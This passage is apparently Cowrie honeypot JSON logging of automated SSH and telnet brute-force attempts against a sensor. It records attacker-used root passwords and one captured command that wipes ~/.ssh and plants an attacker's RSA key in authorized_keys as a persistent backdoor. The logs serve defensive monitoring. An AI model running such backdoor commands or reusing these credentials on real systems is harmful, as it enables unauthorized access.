openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T12:38:32.346235Z","src_ip":"212.227.125.160","session":"291ab3404598"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:38:32.695903Z","src_ip":"212.227.125.160","session":"291ab3404598"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T12:38:32.812852Z","session":"291ab3404598"}
{"eventid":"cowrie.session.closed","duration":12.68494176864624,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:38:36.108980Z","src_ip":"212.227.125.160","session":"c62172d2c6d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33885,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ef13d05687d","protocol":"telnet","message":"New connection: 212.227.125.160:33885 (1.2.3.4:23) [session: 6ef13d05687d]","sensor":"my-vps","timestamp":"2025-08-26T12:38:36.436799Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58176,"dst_ip":"1.2.3.4","dst_port":23,"session":"10d1bf2d2e22","protocol":"telnet","message":"New connection: 212.227.125.160:58176 (1.2.3.4:23) [session: 10d1bf2d2e22]","sensor":"my-vps","timestamp":"2025-08-26T12:38:36.466087Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:38:36.550955Z","src_ip":"212.227.125.160","session":"10d1bf2d2e22"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:38:36.595754Z","src_ip":"212.227.125.160","session":"10d1bf2d2e22"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T12:38:36.597197Z","src_ip":"212.227.125.160","session":"10d1bf2d2e22"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T12:38:36.598553Z","src_ip":"212.227.125.160","session":"10d1bf2d2e22"}
{"eventid":"cowrie.session.closed","duration":12.712160110473633,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:38:49.148928Z","src_ip":"212.227.125.160","session":"6ef13d05687d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34189,"dst_ip":"1.2.3.4","dst_port":23,"session":"33d4bd3b4a93","protocol":"telnet","message":"New connection: 212.227.125.160:34189 (1.2.3.4:23) [session: 33d4bd3b4a93]","sensor":"my-vps","timestamp":"2025-08-26T12:38:49.320585Z"}
{"eventid":"cowrie.session.closed","duration":12.820584535598755,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:39:02.141106Z","src_ip":"212.227.125.160","session":"33d4bd3b4a93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34505,"dst_ip":"1.2.3.4","dst_port":23,"session":"f05d136c60f8","protocol":"telnet","message":"New connection: 212.227.125.160:34505 (1.2.3.4:23) [session: f05d136c60f8]","sensor":"my-vps","timestamp":"2025-08-26T12:39:02.352007Z"}
{"eventid":"cowrie.session.closed","duration":12.783124208450317,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:39:15.135021Z","src_ip":"212.227.125.160","session":"f05d136c60f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34821,"dst_ip":"1.2.3.4","dst_port":23,"session":"41f9c2f311c5","protocol":"telnet","message":"New connection: 212.227.125.160:34821 (1.2.3.4:23) [session: 41f9c2f311c5]","sensor":"my-vps","timestamp":"2025-08-26T12:39:15.313893Z"}
{"eventid":"cowrie.session.closed","duration":12.81083369255066,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:39:28.124661Z","src_ip":"212.227.125.160","session":"41f9c2f311c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35130,"dst_ip":"1.2.3.4","dst_port":23,"session":"70a6aa49c724","protocol":"telnet","message":"New connection: 212.227.125.160:35130 (1.2.3.4:23) [session: 70a6aa49c724]","sensor":"my-vps","timestamp":"2025-08-26T12:39:28.416494Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51200,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c8d26e0293b","protocol":"telnet","message":"New connection: 212.227.125.160:51200 (1.2.3.4:23) [session: 8c8d26e0293b]","sensor":"my-vps","timestamp":"2025-08-26T12:39:40.114652Z"}
{"eventid":"cowrie.session.closed","duration":12.748183488845825,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:39:41.164607Z","src_ip":"212.227.125.160","session":"70a6aa49c724"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35431,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ec5b1f82e9c","protocol":"telnet","message":"New connection: 212.227.125.160:35431 (1.2.3.4:23) [session: 5ec5b1f82e9c]","sensor":"my-vps","timestamp":"2025-08-26T12:39:41.317686Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:39:42.228672Z","src_ip":"212.227.125.160","session":"291ab3404598"}
{"eventid":"cowrie.session.closed","duration":12.805773496627808,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:39:54.123347Z","src_ip":"212.227.125.160","session":"5ec5b1f82e9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35741,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f43d939cb01","protocol":"telnet","message":"New connection: 212.227.125.160:35741 (1.2.3.4:23) [session: 1f43d939cb01]","sensor":"my-vps","timestamp":"2025-08-26T12:39:54.338446Z"}
{"eventid":"cowrie.session.closed","duration":12.77812647819519,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:07.116476Z","src_ip":"212.227.125.160","session":"1f43d939cb01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36044,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a238a8a468f","protocol":"telnet","message":"New connection: 212.227.125.160:36044 (1.2.3.4:23) [session: 6a238a8a468f]","sensor":"my-vps","timestamp":"2025-08-26T12:40:07.313225Z"}
{"eventid":"cowrie.session.closed","duration":30.469934225082397,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:10.584513Z","src_ip":"212.227.125.160","session":"8c8d26e0293b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53488,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7ee38ab0f61","protocol":"ssh","message":"New connection: 212.227.235.229:53488 (1.2.3.4:22) [session: e7ee38ab0f61]","sensor":"my-vps","timestamp":"2025-08-26T12:40:10.922077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:40:10.923151Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:40:11.152871Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.login.success","username":"root","password":"Root2023@","message":"login attempt [root/Root2023@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:40:12.113691Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:40:12.632715Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:40:12.633405Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:40:12.634895Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:12.866293Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:40:13.342210Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:40:13.342916Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:40:13.575682Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:13.576594Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53492,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4da678cf1fe","protocol":"ssh","message":"New connection: 212.227.235.229:53492 (1.2.3.4:22) [session: d4da678cf1fe]","sensor":"my-vps","timestamp":"2025-08-26T12:40:13.788767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:40:13.789461Z","src_ip":"212.227.235.229","session":"d4da678cf1fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:40:14.011665Z","src_ip":"212.227.235.229","session":"d4da678cf1fe"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:40:14.943332Z","src_ip":"212.227.235.229","session":"d4da678cf1fe"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:16.168232Z","src_ip":"212.227.235.229","session":"d4da678cf1fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53494,"dst_ip":"1.2.3.4","dst_port":22,"session":"73081e1b1deb","protocol":"ssh","message":"New connection: 212.227.235.229:53494 (1.2.3.4:22) [session: 73081e1b1deb]","sensor":"my-vps","timestamp":"2025-08-26T12:40:16.389085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:40:16.390153Z","src_ip":"212.227.235.229","session":"73081e1b1deb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:40:16.612267Z","src_ip":"212.227.235.229","session":"73081e1b1deb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:40:17.541940Z","src_ip":"212.227.235.229","session":"73081e1b1deb"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:17.765168Z","src_ip":"212.227.235.229","session":"73081e1b1deb"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:17.773344Z","src_ip":"212.227.235.229","session":"e7ee38ab0f61"}
{"eventid":"cowrie.session.closed","duration":12.829007387161255,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:20.142169Z","src_ip":"212.227.125.160","session":"6a238a8a468f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36349,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe4076691e1d","protocol":"telnet","message":"New connection: 212.227.125.160:36349 (1.2.3.4:23) [session: fe4076691e1d]","sensor":"my-vps","timestamp":"2025-08-26T12:40:20.345812Z"}
{"eventid":"cowrie.session.closed","duration":12.767703533172607,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:33.113410Z","src_ip":"212.227.125.160","session":"fe4076691e1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36668,"dst_ip":"1.2.3.4","dst_port":23,"session":"3137451c16b2","protocol":"telnet","message":"New connection: 212.227.125.160:36668 (1.2.3.4:23) [session: 3137451c16b2]","sensor":"my-vps","timestamp":"2025-08-26T12:40:33.300053Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36916,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a7643b1d97d","protocol":"ssh","message":"New connection: 212.227.235.229:36916 (1.2.3.4:22) [session: 3a7643b1d97d]","sensor":"my-vps","timestamp":"2025-08-26T12:40:43.903677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:40:43.904550Z","src_ip":"212.227.235.229","session":"3a7643b1d97d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T12:40:44.244880Z","src_ip":"212.227.235.229","session":"3a7643b1d97d"}
{"eventid":"cowrie.session.closed","duration":12.892980337142944,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:46.192963Z","src_ip":"212.227.125.160","session":"3137451c16b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36992,"dst_ip":"1.2.3.4","dst_port":23,"session":"05af057ff7e9","protocol":"telnet","message":"New connection: 212.227.125.160:36992 (1.2.3.4:23) [session: 05af057ff7e9]","sensor":"my-vps","timestamp":"2025-08-26T12:40:46.430765Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:53.904051Z","src_ip":"212.227.235.229","session":"3a7643b1d97d"}
{"eventid":"cowrie.session.closed","duration":12.685131549835205,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:40:59.115800Z","src_ip":"212.227.125.160","session":"05af057ff7e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37296,"dst_ip":"1.2.3.4","dst_port":23,"session":"ffbddc9c5c59","protocol":"telnet","message":"New connection: 212.227.125.160:37296 (1.2.3.4:23) [session: ffbddc9c5c59]","sensor":"my-vps","timestamp":"2025-08-26T12:40:59.316535Z"}
{"eventid":"cowrie.session.closed","duration":12.757377862930298,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:41:12.073847Z","src_ip":"212.227.125.160","session":"ffbddc9c5c59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:41:36.605295Z","src_ip":"212.227.125.160","session":"10d1bf2d2e22"}
{"eventid":"cowrie.session.closed","duration":180.1449499130249,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:41:36.610953Z","src_ip":"212.227.125.160","session":"10d1bf2d2e22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51938,"dst_ip":"1.2.3.4","dst_port":22,"session":"21fd4b85e8fd","protocol":"ssh","message":"New connection: 212.227.235.229:51938 (1.2.3.4:22) [session: 21fd4b85e8fd]","sensor":"my-vps","timestamp":"2025-08-26T12:42:24.276817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:42:24.277609Z","src_ip":"212.227.235.229","session":"21fd4b85e8fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:42:24.528492Z","src_ip":"212.227.235.229","session":"21fd4b85e8fd"}
{"eventid":"cowrie.login.failed","username":"deep","password":"deep@123","message":"login attempt [deep/deep@123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:42:25.574105Z","src_ip":"212.227.235.229","session":"21fd4b85e8fd"}
